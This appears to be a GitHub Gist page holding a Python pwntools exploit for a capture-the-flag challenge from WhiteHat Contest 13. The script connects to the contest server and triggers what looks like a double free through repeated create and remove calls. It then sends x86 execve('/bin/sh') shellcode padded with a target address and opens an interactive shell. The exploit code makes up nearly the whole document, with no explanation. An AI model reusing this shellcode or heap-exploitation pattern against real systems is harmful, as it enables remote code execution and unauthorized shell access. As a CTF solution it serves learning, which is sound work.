Last active
May 31, 2017 13:39
-
-
Save 0xPwny/af3b674ab454a6bed593468f5da50930 to your computer and use it in GitHub Desktop.
WhiteHat Contest 13 - Pwnable Ho Coc Beach - Exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from pwn import * | |
| #Author = <Abdeljalil Nouiri - [email protected]> | |
| #con = process( "./do_twice" ) | |
| con = remote("dotwice.wargame.whitehat.vn", 1337) | |
| shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" | |
| addr = 0x804b0c0 | |
| def create_passenger( name ): | |
| con.sendline( "1" ) | |
| con.recvuntil( ":" ) | |
| con.sendline( name ) | |
| con.recvuntil( "4.Remove staff" ) | |
| def create_staff( name ): | |
| con.sendline( "3" ) | |
| con.recvuntil( ":" ) | |
| con.sendline( name ) | |
| def remove_passenger(): | |
| con.sendline( "2" ) | |
| con.recvuntil( "4.Remove staff" ) | |
| create_passenger( "AB" ) | |
| create_passenger( "CD" ) | |
| remove_passenger() | |
| remove_passenger() | |
| payload = shellcode.ljust(79, "A") | |
| payload += p32(addr) | |
| create_staff( payload ) | |
| con.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment